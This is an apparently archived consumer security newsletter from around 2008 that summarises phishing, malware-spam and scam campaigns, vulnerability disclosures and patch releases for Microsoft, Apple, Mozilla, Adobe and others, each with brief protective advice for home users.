Promisec has released an online encyclopedia of internal network security threats. The encyclopedia, which can be viewed by anyone for free, is continually updated with detailed explanations of the latest internal threats. The site contains monthly charts showing how internal network risk trends have changed in the past year, an internal security tips and tricks section, articles on recent internal security incidents, an overview of internal threats, and a wide array of other resources.

Check it out at promisec dot com slash encyclopedia.

CNN Scam Morphs to MSNBC, Weekly News, etc. - Now Debt Consolidation
Hackers trying to plant malware on PCs switched from touting news supposedly from CNN in come-on messages to pushing breaking stories said to be from rival network MSNBC, and most recently simply titling them, "Weekly News Release".

The fake messages pose with subject headings that include the phrase “Breaking News,” along with phony headlines, such as “Jerry Yang relinquishes control over Yahoo,” “Mary-Kate Olsen responsible for Heath Ledger’s death” and “Plane crashes into prep school, hundreds of kids killed,”

At its peak, the blitz dumped nearly 11 million messages an hour on users. But as of today it seems this particular attack has come to an abrubt halt and now the latest blast of phishing schemes are all debt related come-ons.

The scammers will just keep evolving their tactics, so your job is to remain skeptical and remind all your friends and relations that if it seems to good to be true, it probably is.

New Phishing Scam Targets Apple MobileMe Users
There have been new reports of a phishing attack circulating via email messages that appear to be targeting Apple MobileMe users.

These messages claim that there is a problem with the user's billing information and instruct the user to follow a web link to update personal information. Clicking on this link directs the user to a web page that contains a seemingly legitimate web form requesting personal and financial information. Any information entered in this form is not sent to Apple but rather, to a malicious attacker.

If you use Apple's MobileMe, be aware of this attack and delete any messages that look suspicious.

Hackers Leverage Olympics In New Attacks
As we expected and warned about last time, Internet and computer security firms report that the Summer Olympics have presented cyber criminals with an opportunity to leverage public interest in the games to launch new attacks.

Olympic themed junk emails spiked before the games’ opening ceremony, with hackers sending malicious messages aiming to trick unsuspecting recipients into opening booby-trapped attachments or to visit phony Web sites. Some of the messages were disguised as fake award notifications, telling users that they had won an Olympic lottery and needed to respond to claim their prize.

SPAM E-Mail Uses Russia/Georgia Conflict
There are public reports of malware circulating via spam email messages related to the Russia/Georgia conflict. These messages contain factual information about the conflict. The messages also contain download instructions for the user to watch a video that is attached to the message. If a user opens the attachment, malware may be downloaded and installed onto their system.

Clipboards Hijacked in Web Attack
Whenever you copy and paste or cut and paste text or files your operating system saves that information to your "clipboard". We have learned of a new attack that hijacks the clipboard and puts a hard-to-delete web-link into the clipboard that, if followed, leads to a website selling fake security software.

Researchers have found that some big websites, including Digg, MSNBC, and Newsweek, are being salted with these malware-infected Adobe Flash banner ads. Any web browser on Windows, Mac, and Linux systems that runs Flash, which is almost all of them including Microsoft’s Internet Explorer, Apple’s Safari, and Mozilla’s Firefox, is said to be vulnerable.

The malicious advertisements place a persistent URL on the user’s clipboard, which points to a fake anti-virus program that presumably contains malware like a Trojan, keyboard logger, zombie robot, or rootkit. The user has to close and restart the web browser or even reboot the system in order to purge the offending URL and make their clipboard usable again. It is apparently not known yet how the offending banner ads are being inserted or served.

More Security Holes Plague MySpace, Possibly Facebook
MySpace was working to fix a security hole on Monday that allows people to see private comments friends have written on members' pages.

"MySpace is committed to keeping all users as safe and secure as possible. Today, MySpace was alerted to an issue within the MySpace Mobile WAP site and is working to roll out an immediate fix," a MySpace spokesperson wrote in an e-mail.

With the MySpace hole, people have to go through the company's mobile page and know the user ID of a member to read their private comments, said Canadian computer technician Byron Ng, who alerted CNET News to the issue and said he had previously contacted MySpace as well.

Getting someone's user ID is easy; just hover over the name and the user ID is the first group of numbers buried in the coding at the bottom of the page.

In addition, security vulnerabilities publicized by Ng in June that allow MySpace users to delete bulletins from groups they don't control, to pin and unpin topics in groups they aren't members of, and to post messages to a group they are banned from remained unfixed. Those issues are expected to be fixed within the week, MySpace said.

Meanwhile, Facebook was investigating possible security issues of its own, including a third-party app that lets people see comments written on member pages, even if they aren't their friends.

"We're still checking on Advanced Wall but we've confirmed that there is not a hole in Free Gifts," a Facebook spokesman wrote in an e-mail. "It's only public gifts that can be seen in the manner you propose below, which is how they are meant to be seen.... Private gifts are not shown on this page."

Facebook users should remember that photos and videos are public unless the person who posts them sets the privacy setting to private. MySpace users should make sure to keep their versions up to date and ensure their settings are correct to ensure privacy.

Facebook Blocks Links Between Its Site and Malware Infested Web Sites
"We've identified and blocked the ability to link to the malicious Web sites from anywhere on Facebook. Less than .002% of people on Facebook have been affected, all of whom we notified and suggested steps to remove the malware," wrote Max Kelly, Facebook's head of security, in a blog post early Friday.

Security company Sophos PLC had recently issued a warning about the attack, in which malicious hackers were targeting unsuspecting Facebook users via postings on the site's Wall feature.

The Wall, a core component of Facebook profile pages, is used by members to leave one another messages. Impersonating members' friends, malicious hackers posted messages urging users to click on a link to view a video on a Web site they falsely said was hosted by Google.

However, the link took users to a rogue Web page where they were told to download a new version of Adobe Systems Inc.'s Flash player in order to view the video. If users authorized the download, the site would install a Trojan horse, Troj/Dloadr-BPL, that funneled other malicious code detected as Troj/Agent-HJX into their PCs.

Then, an image of a court jester sticking his tongue out would appear. Facebook members might think it was an innocent practical joke by a friend, but in fact, at that point, their PCs would have been seriously compromised and put in the control of malicious hackers so they could be used to disseminate spam and malware and perform other harmful actions, according to Sophos.

UTorrent Peer to Peer Client Fixes Vulnerability
One of the most popular programs used by some to illegally share files under copyright has patched a serious software vulnerability.

The problem affects the P-to-P (peer-to-peer) program uTorrent as well as BitTorrent Mainline, another program based on the uTorrent code. It has been classified as “highly critical,” the second most severe ranking of risk, by Secunia, a security vendor in Denmark. Both programs use the BitTorrent protocol, which has become the most popular method of file sharing worldwide, according to iPoque, a company based in Leipzig, Germany, that specializes in traffic-management appliances for ISPs.

The programs collect pieces of a particular file from other computers around the world and assemble it. The vulnerability can be exploited if a user downloads a malicious torrent, which is a text file that coordinates the downloading of content. The problem causes a stack overflow, which can allow an attacker to upload other malicious software to a PC. The bug was in the software for at least two years, wrote the researcher who is credited with the find.

If you use UTorrent or BitTorrent for Peer to Peer file sharing (or any other P2P software), be aware that these can be extremely dangerous (you can never know for sure the files you are downloading aren't infected - nearly 70% have at times been shown to be malware). If you choose to use these services, be sure your antivirus is running and up to date, and be sure to use the P2P software's most recent clients.

Microsoft Issues Massive Security Update for Windows, Office
In its largest batch of security fixes in 18 months, Microsoft Corp. last week released 11 software updates to plug 26 holes in Windows, Office, Internet Explorer, and other products. Six of the updates were tagged “critical,” Microsoft’s highest severity rating.

The company acknowledged that at least two of the vulnerabilities being patched have already been exploited by attackers in the wild. Those two, plus another pair, said one security researcher, should be considered "zero-day" bugs because technical details about the flaws had been circulating prior to today.

This month’s update count was supposed to be even larger: Microsoft said it decided not to issue an expected fix for Windows Media Player 11 “because of a last-minute quality issue.”

If you are using Microsoft Operating Systems or Office software, be sure that you have applied this update. We recommend using AutoUpdate and enabling it to automatically install any new updates from Microsoft.

Opera v9.52 Available As Security Upgrade
Opera has released a recommended security and stability upgrade. It fixes the following issues:

• Fixed a startup crash that could allow execution of arbitrary code
• Sites can no longer change framed content on other sites
• Fixed an issue that could allow cross-site scripting
• Custom shortcuts no longer pass the wrong parameters to applications
• Prevented insecure pages from showing incorrect security information
• Feed links can no longer link to local files
• Feed subscription can no longer cause the wrong page address to be displayed

Researcher Reveals Critical Java Bugs in Nokia Phones
A pair of critical vulnerabilities in Sun Microsystems Inc.'s Java technology for mobile devices could be used by hackers to surreptitiously make calls, record conversations and access information on Nokia Series 40 cell phones, a Polish researcher reports.

Adam Gowdiak, a researcher who has found numerous bugs in Java 2 Micro Edition (J2ME) in the past, said he reported the two vulnerabilities to Sun last Thursday and notified Nokia the same day of the security issues in its handsets.

Bank Warns of Cell Phone Scam
We are hearing reports of these types of scams all across the country. This week, the chief executive officer of Mutual Bank urged the public to beware of a cell phone/identity theft scam, and to immediately contact authorities if they receive such a message.

A number of cell phone owners in the region received text messages from a source claiming to be Mutual Bank, saying that the customer’s bank account access had been locked, and urging recipients to call 508-424-1203 to restore the account. According to the official, a recorded message then asks for the customer’s card and pin number.

He said the scam is apparently the work of scam artists who picked the name of the bank and sent text messages to a random list of cell phone owners, in the hope that at least some of the people on their list were actually Mutual Bank customers. The cell phone numbers did not come from Mutual Bank, he said.

These types of attacks are becoming commonplace. Please be aware of them and inform your vulnerable friends and family.

GMail Tip - Use HTTPS To Ensure Security
Some Gmail users already know that to ensure your gmail session can't be picked up in public wi-fi areas, you need to login via https://mail.google.com. Doing so puts your mail session into 128-bit encryption, so that, as Ryan Singel of 'Threat Level' puts it, "[it leaves] would-be Wi-Fi snoops at a cafe staring at the electronic equivalent of a blended latte."

Basically, anytime you are using a public wi-fi system, you should always login to your web based email accounts using https if it is available. Otherwise your email session is easily readable by anyone with a wi-fi monitoring application.

But there's another type of attack that can allow the attacker to grab a cookie over the wi-fi airwaves and login to your account temporarily, even though they don't know your password. This attack is about to get very easy with the release of a new hacking tool.

Simply logging in to https won't save you from this one. Instead you need to make your Gmail (or other web based email accounts) always run using a secure protocol such as SSL.

If you are a Gmail user, login, go to settings and then look for Browser connection. Select always use https:// unless you have a desktop and a dial-up connection. If you use other web-based email, look for a similar setting and enable it.

CNN Top Ten Scam
We have seen a large influx of a new SPAM email this week with three different CNN subject lines. We have 'CNN Top 10 XP Antivirus' and 'CNN.com Daily Top 10' the other day and today, we have 'CNN Alerts: My Custom Alert'.

We've also had reports of increasing use of the upcoming Olympics by scammers to try to entice people to click on links, or open files in emails.

With the CNN attack, users were directed to a website with a blank video that used an enticing news item as its title. If you clicked on the video it would prompt you to download a program to run the video. This was, of course, a malware program that in most cases just trashed computers, but in some, took them over as part of a botnet.

We can expect to see many more of these types of attacks as they peak curiosity and seem to work very well. The Olympics or any other internationally known event are a perfect ruse.

Expect these type of scams and avoid them by simply deleting any emails that promise a news story.

Storm Trojan Using FBI vs. FaceBook
A new spam that is yet another push of the Storm trojan is showing up with titles like "FBI may strike Facebook" or "FBI watching us". The purveyors of the Storm malware are relentless and have not missed a trick to keep trying to get their malicious software out there. In July alone we saw an Independence Day attack and more recently a campaign playing on people's fears about the worldwide financial situation.

The Storm malware is one of the largest bot creators ever built. It is responsible for recruiting many hundreds of thousands of un-knowing users' computers into remote controlled "botnets". These are used to spread more spam, extort web sites and critical infrastructure, and create denial of service attacks.

Be aware of these types of attacks and just delete!

Airline E-Ticket Scam
Public reports indicate that a new email attack is circulating that uses email messages that appear to be from legitimate airlines and contain information about a bogus e-ticket. These email messages instruct the user to open the attachment to obtain the e-ticket. If a user opens this attachment, a file may be executed to infect the user's system with malicious code. Reports, including a posting by Sophos, indicate that these messages have the following characteristics (please note that these attributes may change at any time):

• The subject line "E-Ticket#XXXXXXXXXX"
• An attachment named "eTicket#XXXX.zip"

Yahoo Sold to Microsoft - More Fake Headline Spam
Security vendor Marshal is warning that a growing large-scale botnet – called Rustock - is forwarding spam containing exploitive headlines in an attempt to infect users and grow its network.

Numerous small businesses and private web sites, so far predominantly in U.S. and China, have been targeted in the campaign, claimed Marshal. The security vendor warned a variety of headlines are being used to lure victims into clicking on a malicious link. They include: “Yahoo sold to Microsoft, record price;” “Bush Down to 8 Friends on Myspace;” “Al Qaeda Reports Declining Revenues in Fiscal ‘08.”

The spammers appear to be experimenting to see which types of headlines solicit the most hits from recipients. Marshal’s records revealed that Rustock is estimated to comprise over 150,000 infected PCs and distributes close to 30 billion spam messages daily which in terms of volume makes it one of the biggest malicious spam campaigns ever seen.

Music Files Used to Spread Malware
A new kind of malicious software could pose a danger to Microsoft Windows users that download music files on peer to peer networks. The new malware inserts links to dangerous Web pages within ASF (Advanced System Format) media files. If a user plays an infected music file, it will launch Internet Explorer and load a malicious Web page which asks the user to download a codec. Users on a digital audio enthusiast site differed over the danger level of the malware.

Twitter Exploits
In the last couple of weeks we have seen reports of Twitter vulnerabilities and now exploits are being seen in the wild. A Twitter profile has started sending links with lures to a pornographic video of Brazilian pop star Kelly Key. This profile has been especially created to infect users. If a user clicks on the video link they see a window that shows the progress of an automatic download of a so-called new version of Adobe Flash, supposedly required to view the video. You end up with a file falsely labeled 'Adobe Flash' on your computer (this is a very popular new technique with scammers). This file is in reality a Trojan downloader that proceeds to download malware disguised as MP3 files.

Twitter also contains a known and unpatched auto follow-me vulnerability that, though partially patched, can still be exploited on Internet Explorer. It basically allows an attacker to infect your account so that you automatically "follow" the attackers twitters. This means that they can put anything they want on their twitter page and you will automatically be directed to it and consume it if it is malware.

If you are a user of Twitter, watch for these types of scams and be sure to patch with the latest versions as soon as they are available.

Facebook and MySpace Being Used to Spread Malware
Facebook and Myspace are being exploited to spread a worm that is a fake Flash Player update. The worms send a variety of comments and messages to the friends of anyone infected. The comments use the names of celebrities such as Paris Hilton and topis such as hacking and secret cameras to convince potential victims to click a link.

If you click the link you are redirected to a Web site which announces you need to download an update to your Flash player. (NOTE: Does anyone else notice a pervading theme to this week's newsletter?)

These types of attacks are particularly difficult to repress because they are using the trust you have in your social network. A message or comment left by one of your "friends" is much more likely to be successful and in fact these have proven to be extremely lucrative for the bad guys.

If you are a member of a social networking site, remember the lessons of email. Don't click on any links that you can't be sure are legitimate. If you're not sure - use that old fashioned telephone thing to call your friend and see if they actually sent you the link.

A Photo That Can Steal Your Facebook Account
And while we're talking about Facebook...

At the Black Hat computer security conference in Las Vegas next week researchers will demonstrate software they have developed that could steal online credentials from users of popular Web sites such as Facebook, eBay, and Google.

The attack relies on a new type of hybrid file that looks like different things to different programs. By placing these files on Web sites that allow users to upload their own images, the researchers can circumvent security systems and take over the accounts of Web surfers who use these sites.

They call this type of file a graphics interchange format java archive (GIFAR). At Black Hat, the researchers will show attendees how to create the GIFAR while omitting a few key details to prevent it from being used immediately in any widespread attack. The attack could work on any site that allows users to upload files, potentially even on Web sites that are used to upload banking card photos or even Amazon.com. Because GIFARs are opened by Java, they can be opened in many types of browsers. However, the victim would have to be logged into the Web site that is hosting the image for the attack to work.

Possible Back Door Built Into Skype
According to reports, there may be a back door built into Skype, which allows connections to be bugged. Skype has declined to expressly deny the allegations.

At a meeting with representatives of ISPs and the Austrian regulator on lawful interception of IP based services held on 25th June, high-ranking officials at the Austrian interior ministry revealed that it is not a problem for them to listen in on Skype conversations. This has been confirmed by a number of the parties present at the meeting.

Skype declined to give a detailed response to specific enquiries as to whether Skype contains a back door and whether specific clients allowing access to a system or a specific key for decrypting data streams exist. There has long been speculation that Skype may contain a back door.

Because the vendor has not revealed details of its proprietary Skype protocol or of how the client works, questions as to what else Skype is capable of and what risks are involved in deploying it in an enterprise environment remain open.

Apple Wins! (Or NOT)
Apple has achieved the dubious honor of now having the most reported vulnerabilities of any vendor. Microsoft, the reigning champion for many years has actually fallen to 3rd place behind open source content management system Joomla.

The final results were very close according to the IBM X-Force 2008 mid-year report. Apple achieved a vulnerability disclosure of 3.2 percent, followed by Joonla with 2.7 percent and Microsoft at 2.5 percent.

Another Apple Update
Apple has released Security Update 2008-005 to address multiple vulnerabilities that affect a number of applications. These vulnerabilities may allow an attacker to conduct DNS cache poisoning attacks, execute arbitrary code, cause a denial-of-service condition, or access the affected system with elevated privileges. Please note that this update addresses recent issues with weaknesses in common DNS implementations; see Vulnerability Note VU#800113 for additional information.

International Phone Scam
A resident agent in charge of the Knoxville office of the U.S. Secret Service said some 8 to 10 areas of the country were targeted recently by an international organized crime group. The organized crime group, the official said, routed recorded messages to U.S. phone numbers through an Iowa telephone company where the group had leased a block of telephone numbers.

For intance, thousands of residents in one county received telephone calls on Wednesday night and Thursday morning that claimed to be from a local bank and which warned the recipients that their bank cards had been canceled. The recorded messages directed persons to call a Des Moines, Iowa, telephone number, supposedly to get their bank cards reinstated. When that number was called, residents heard another recorded message that directed them to key in their bank account and PIN numbers.

The Secret Service agent also noted that the bank’s own records were not compromised by the scam. He said the criminals did not obtain telephone numbers of local residents from the bank. Instead, he said, the criminals apparently used computer software to sequentially generate calls to many telephone numbers in the same area code on Wednesday and Thursday. That, he said, is why many people who had no banking relationship with the local bank received the automated telephone calls.

One of the other areas affected by a similar scam was in central Missouri, according to an article posted on the Web site of KRCG in Jefferson City, Missouri. The July 18 article said Central Bank there had been targeted in similar fashion to the case sited above.

Be aware of these types of scams and be sure to warn your vulnerable friends and relations.

New Version of Mozilla Thunderbird E-Mail Client Released
The Mozilla Thunderbird e-mail client has just been updated to address eight security issues.

If you use Thunderbird as your email client you should update to version 2.0.0.16.

Researcher Warns of Unpatched iPhone Bugs
Security vulnerabilities in the iPhone’s e-mail application and Safari Web browser can be used by phishers to dupe users into visiting malicious sites or by spammers to flood the phone’s in-box with junk mail, a researcher warned today.

The browser vulnerability researcher said he reported three separate bugs to Apple Inc. about two weeks ago: two in the iPhone Mail program and one in its Safari browser.

Apple has acknowledged that the two vulnerabilities in Mail are security issues, he said, but the company is currently undecided on whether the Safari flaw meets its security bug criteria. At times, Apple has balked at labeling problems as security vulnerabilities, notably in May, when it initially said the so-called “carpet bomb” bug was not security-related.

If you have an Apple iPhone, be aware of these vulnerabilities and watch this list and Apple for the release of an update.

Many Malicious Programs Represent Themselves as Antispyware or Antivirus Programs
It's worth reminding everyone: there is a large category of malicious programs that present themselves as antispyware or antivirus programs. Having already established that they will lie about these things, they may lie about others. For instance, we recently came across one which claims to have won a number of awards, including the PC Magazine Editors' Choice.

The site that this fraudulent email pointed to, appeared to include malicious graphics in an ad that looks like a fairly standard antimalware product advertisement. It also includes a number of award logos including PC Magazine's Editor's Choice Award and the Best of 2005. For the record, PC Magazine ensures us they won neither of those awards.

This site and the fake program you can download from it are written up by Symantec as malicious. They make no claim that it does anything malicious in the sense of infection or spreading itself. Instead they say that once you download and install it, it makes exaggerated claims of threats present on the computer. "The user is then prompted to pay for a full license of the application in order to remove the errors."

To tell the fake from the real thing, once you have the name of a product, simply search for it on Google or some other major search engine. You should quickly notice lots of pages tagging it as malicious.

Fabricated News of Car Accident Used to Distribute Trojan
Fabricated news of a supposed car accident involving Formula One star Fernando Alonso is being used to distribute a new banking Trojan.

The fake news story, supposedly from Spanish daily El Pais, has two-time motor racing champion seriously injured on Tuesday in an accident in the northern city of Bilbao. The bogus story, distributed via spam emails, links to a video clip depicting what appears to be a spectacular blaze. The clip installs malware onto the PC of those falling for the ruse.

The malware is identified by Spanish anti-virus firm Panda Security as Banker-LGC. "This is not the first time we have seen this piece of news used to spread malware though, as a few weeks ago we saw a very similar one, the major difference was that it was trying to install a Gaobot worm instead," notes Luis Corrons, technical director of PandaLabs.

Virus writers, who often latch onto real news events, also resort to making up fake news. At the start of the month one such attack claimed that the Third World War had begun in an attempt to spread another Trojan.

Planting key-stroke logging software onto compromised PCs sits alongside the use of phishing attacks as a means for hackers to gain access to online banking accounts. Traditionally phishing emails attempted to dupe prospective marks into visiting a website under the control of hackers and hand over account credentials.

Dozens of Pierce County, WA Bank Accounts Drained in Debit Card Scam
Dozens of victims have come forward after their bank accounts were drained by thieves. At least 75 people fell victim to a scam by simply using their debit card at a gas station and detectives expect many more reports to come in. Over the Fourth of July weekend, a highly organized group using stolen debit card information withdrew thousands of dollars from Pierce County, Washington, citizens’ bank accounts.

The information was obtained by using electronic skimming machines placed on gas pumps at an ARCO gas Station in Pierce County. Detectives believe the information was stolen in August 2007. Almost a year later, the information was used at multiple banks to withdraw thousand of dollars from each account.

This was done over the three-day weekend to avoid detection. The card numbers and pins were trapped and stolen at the station and were used at ATMs throughout the King County area. Most card losses are around $1,200, but some are much higher – up to $4,000, depending on account balance or overdraft rules.

If anyone has used that ARCO station during that time frame, they should contact their financial institution and get a new card issued..

Vishing Attacks Increase
The IC3 (the FBI's online fraud reporting website) has received multiple reports on different variations of this scheme known as “vishing”. These attacks against U.S. financial institutions and consumers continue to rise at an alarming rate.

A new version recently reported involved the sending of text messages to cell phones claiming the recipient’s on-line bank account has expired. The message instructs the recipient to renew their on-line bank account by using the link provided. Due to rapidly evolving criminal methodologies, it is impossible to include every scenario.

Be aware of this scam and protect your PII (personally identifiable information, such as social security numbers, credit card or bank account information, etc). Beware of e-mails, telephone calls, or text messages requesting your PII and warn your vulnerable friends and relations.

DNS Cache Poisoning Exploit In the Wild - Affecting Sprint Servers
A very serious problem with DNS servers is now being exploited in the wild. We have known about this issue for a while and the major vendors of DNS servers have issued patches, but there are millions of these servers out there and many of them have not yet been patched.

DNS or Domain Name Servers are like the post office online. They take the URL or web site name that you type into your browser and translate it into the correct address to make your connection. Those addresses are kept in tables (called a cache) on all of those millions of DNS servers worldwide, so when you type in a web site name, that name is sent out to one of those servers where it looks up the correct Internet Protocol (IP) address to connect you to.

If a hacker can succeed in poisoning that cache and inserting their own false IP addresses into the cache, they can direct you to fake web sites. These sites may look exactly like the real ones, but in fact they are stuffed full of malware and will attempt to infect your computer.

We have learned today that the Sprint servers are vulnerable to this exploit. There may be other major providers of DNS service that are affected.

Be aware of this threat and watch for more news of affected services. If you use Sprint modems to connect to the Internet you should avoid doing any financial or other sensitive web browsing using that service, until they have patched their systems.

Mozilla Foundation has released updates for Firefox
Updates are now available for the Firefox web browser (version 2.x and 3.x) to address a vulnerability that occurs when the browser is launched from the command line. Updates also address a pair of critical vulnerabilities that have been written about recently. These last two vulnerabilities were part of the Safari "carpet bomb" bug that created a "blended" threat to Microsoft Windows users who had both Apple Inc.'s Safari browser and Firefox installed on the same system as well as Internet Explorer.

If you use Firefox, you should immediately update your browser to the latest version.

Opera Patches Their Browser
Opera Software ASA has patched the newest version of their browser software (version 9.5) for the first time to fix several flaws. The update patches bugs in the Windows, Mac OS X and Linux editions.

If you use Opera, you should immediately update your browser to version 9.5.1.

Apple Issues Security Update for Mac OS X
Apple has released the fourth security update this year for its Mac OS X operating system. This patches 25 vulnerabilities, nearly half of them considered critical. It also updated Safari for the Mac.

If you are running Mac OS X, you should immediately update to version 10.5.4.

Zone Alarm Update Released
Zone Alarm has released a new version to address an issues in the way the latest Microsoft Security Bulletin affected Zone Alarm.

UPS Warns of Fake E-mails with Real Virus
United Parcel Service (UPS) issued a warning Tuesday about fake UPS e-mails that have a real computer virus attached. The e-mails claim to be from “UPS Packet Service” and state that the person receiving the e-mail sent a parcel that could not be delivered because of an incorrect address. The e-mail instructs the reader to open an attachment that contains a copy of the invoice. The attachment, though, instead contains a virus that can wreak havoc on a computer, according to comments posted on the Yahoo! Answers Web site.

In a notice posted on its Web site, UPS said it is aware of the fake e-mail and recommends that anyone receiving it delete it without opening the attachment..

Attackers Target Zero-day Microsoft Word Bug
Microsoft reports a new vulnerablity that affects only Word 2002, Service Pack 3. At this point Microsoft belives this is not affecting other Word versions but they are still investigating and others could in fact be affected.

For the attack to work a user must open a malicious e-mail attachment or visit a rogue website that hosts the vulnerability. Successful exploitation could result in remote execution of programs on your computer by the criminals.

Until a patch is released, be careful not to open any Word attachments that you did not expect to receive. If you recieve a Word document that you think is possibly legitimate, take a moment to contact the sender to verify that they sent it.

New Trojan Targeting Multimedia Files
There is a new Trojan in the wild that targets multimedia files. When you attempt to run one of these infected files you are prompted to install a new codec (an application to help play the multimedia file). This "codec" is in fact a trojan that embeds malware into multimedia files on your computer (such as MP3, WMA music files, WMV video files, etc.).

When the user plays any of these infected files, no sign of the compromise will show up so you will not know you've been infected.

This new Trojan is now part of most antivirus application signature files. Make sure your antivirus is actively running and all signature files are up to date.

Homer Simpson Spreading Malware
A malware research director at FaceTime has reported that a Simpsons screen name is sending auto-reply messages promising a special exclusive episode of the show available for download. The link in the message leads to an executable file. On launching the Trojan, the user is presented with a fake error message followed by several real error messages and finally a blank screen. On restarting, the user’s system will run noticeably slower and be prone to crashes. The malicious payload includes a rootkit and remote control software which logs the user in a botnet.

Again, make sure your antivirus is running and is up to date. And don't trust email from Homer Simpson!

US Military Actions Used to Spread Malware
We are seeing a new wave of spam messages that announce an alleged attack of the U.S. Army against Iran in order to trick users into downloading and installing malicious software onto their personal computers. The webpage hosting the piece of malware – dailydotnews.com – is a simple, yet efficiently designed site with a top banner, a simple picture masquerading as a YouTube player and three lines of text detailing the U.S. operation in Iran. This spam approach is used on large scale as the spammer relies on a catchy heading and a link to the piece of malware in order to fuel users’ curiosity and trick them into downloading the piece of malware. “The new spam wave relies on computer users’ curiosity regarding the conflict between the United States and Iran. Users are redirected to a fake news website, where they are shown a larger, inciting description accompanied by a movie player,” said a BitDefender Spam analyst. “However, the alleged flash movie is an image depicting a movie player; when clicked, the image gives users a ‘Save image as’ option.” Upon clicking on either the “movie” or the top banner, the user starts the download process of a piece of malware, called “iran_occupation.exe.” The file contains the same malicious code infecting the user with the Storm Worm. The authors have used timing to their advantage, as the recent tensions in the Middle East between the U.S. and Iran have been escalating.

We are seeing many new varieties of this type of fraudulent email or website recently. All of them use the same tactics - using current events or fake headlines to induce users to open a web site or download an attachment.

Be vigilant and skeptical of any of these types of emails or headlines - and remind your vulnerable friends and relations to be aware of these types of scams.

Adobe Reader Update Needed (AGAIN!)
It's become almost a weekly experience to hear that Adobe Reader has a new bug that needs to be dealt with. This week it's another Javascript Method problem that allows remote users to execute restricted functions on your computer and take it over. We are hearing reports of this vulnerability being actively exploited

You should immediately update your Adobe Reader software to version 8.12 Security Update 1

Mozilla Firefox Vulnerability
The Mozilla Firefox browser has a new vulnerability that will allow a remote user to execute arbitrary code on a target computer. No solution was available as of this posting.

If you are running Mozilla Firefox at home you should have automatic updates turned on. If you don't you should check regularly for patches and apply them as soon as they are available..

DNS Trojan Hacks Home Routers
We've had reports this week of a new trojan that hacks into home wireless routers and changes their DNS settings. DNS is like an address book that tells the router where to look for the actual Internet Protocol (IP) address when you type in a URL (like www.amazon.com). If the bad guys mess with your DNS settings they can tell your router to connect you up to their servers instead of the legitimate servers you are looking for. So when you type www.amazon.com you are directed to a hacker's server that may look exactly like amazon.com but in fact is attacking your computer as soon as you connect.

The new trojan also indirectly infects any computer that is connected to the wireless router. Home wireless routers are often easy prey for hackers because home users don't know how or care to lock them down. Of course no one reading this newsletter would ever have an insecure wireless router...

Make sure your antivirus is up to date and if you are running a wireless network at home, check out our 'Wireless Network Security Guidelines' (link in the left pane), and make sure your router is secured.

Voice Over IP (VOIP) Phone Vulnerabilities
Avaya, Cisco and Nortel VOIP phones have new found vulnerabilities that would allow remote code execution, unauthorized access, denial of service, or information harvesting. The vulnerabilities affect voice servers (VOIP PBXes) and softphone software that runs on laptops or desktops.

If you use any of these types of VOIP phones, you should look for patches to be made available soon by the vendors.

Internet Travel Scam
This scam involves a website called Tickets2cheap.com boasting the lowest airfares in the world, believed to be run out of South Africa. The company asks for payment through cash remittance agencies. When the money is received the fraudsters use stolen credit cards to purchase the tickets. Often those credit cards have been cancelled by the time the traveller is ready to travel and the tickets are no longer valid.

We do not recommend sending cash or using cash remittance agencies unless you have done a very thorough check of the veracity and legitimacy of any company you do business with.

MAC OS X Vulnerabilties
In the last week or so we have seen several reports of new trojan vulnerabilities aimed at the MAC OS X operating system. Apple maintains that these are not a real problem yet, but we are seeing reports of their being actively exploited.

If you are running MAC OS X at home, make sure your antivirus is up to date and watch for any new updates from Apple - apply them as soon as they are available.

Apple Safari for Windows Fix
Microsoft and Apple argued over who was at fault for awhile, but now Apple has released a fix for a security issue in their Safari browser for Windows.

If you use the Safari browser for Windows you should update it to version 3.1.2 as soon as possible.

QuickTime Update
Apple has released an important update to it's media player QuickTime, that fixes several dangerous media processing errors. These could have been exploited by sending users infected media files to cause buffer overflows and other problems that would allow criminals to gain complete control of victim's computers.

If you have QuickTime on your computer you should immediately upgrade to version 7.5.

Microsoft Patch Tuesday
Microsoft released seven new security updates on Tuesday 6/10, three of which it rated as critical.

If you are running Microsoft Windows at home you should have automatic updates turned on. If you don't you need to go to Internet Explorer, click on Tools, and click on Microsoft Update to get these latest patches..

Open Office Security Update
Open Office is an open source office suite that includes a word processor, spreadsheet application, etc. If you are running this application on your home computer, please be aware that there is a new vulnerability that is addressed in it's latest update.

If you are running Open Office, you should immediately update to version 2.4.1

Blackmailing Trojan
In a new and much more nefarious version of a nasty malware attack, we are seeing a trojan that encrypts all of the .bak (backup), .doc (Word documents), .jpg (pictures), and .pdf (Adobe documents) on your hard drive and deletes the originals. It then erases itself after leaving a small read me text file on your computer that tells you where you can "buy" a decryption tool.

Kapersky Labs, an antivirus vendor and research team, refers to this as the latest in "ransomware". It is basically an extortion scheme.

Your best defense against this type of attack is to backup your personal and important files regularly to separate and external media such as an external hard drive or CD/DVD's that do not remain connected to your computer. It is also important to ensure that your antivirus applications are up to date.

Bank Social Engineering attacks
We have heard reports from several areas in the country recently of massive attacks on a particular bank or credit union. These attacks use email, phone and even texting and regular mail to inundate customers and non-customers of a certain institution with solicitations that ask the receiver to call a number to learn about recent activity on their bank account, or warn of fraud attempts against the bank with links to a security prevention program.

It is likely that we may see a similar attack scheme in our area, so be aware and warn those of your friends and families that might be vulnerable.

FBI and British Government Bogus e-mails
In the latest of this type of email scam using official government logos, the FBI is warning about fake e-mails purporting to be from the FBI's Internet Fraud Complaint Center and the British government. The new scam claims to involve a reimbursement of funds lost from Internet fraud.

The fake notice informs recipients, “The approved committees have approved the sum of $35,000.00 (Thirty five thousand dollars) for your scam compensations the bank of England [sic] will be contacting you soon to remit the approved amount to your account.” The scam notice indicates that failure to comply will place the funds on hold and a penalty will be applied to the recipient’s bank account.

Be aware of this type of scam. The FBI does not use email to contact victims of phishing schemes or fraud.

"What a Stupid Face Your have here [insert your name]"
This particularly pleasant email phishing scam seems to get past some anti-phishing filters by using popular domains such as att.com and earthlink.com and real user names.

The virus that it delivers locks up your computer and puts crawling cockroaches all over your screen. More annoying than destructive as far as we've been able to tell, but it may just be a test to see how many people will respond to this interesting subject line. I guess when someone tells you they have something with a "stupid face" and your own name in the subject, it is hard to resist, as we've seen this SPAM proliferate expansively in the last few days.

If you receive an email like this, just delete it. If you see it in your filtered SPAM list, do not open it or have it delivered.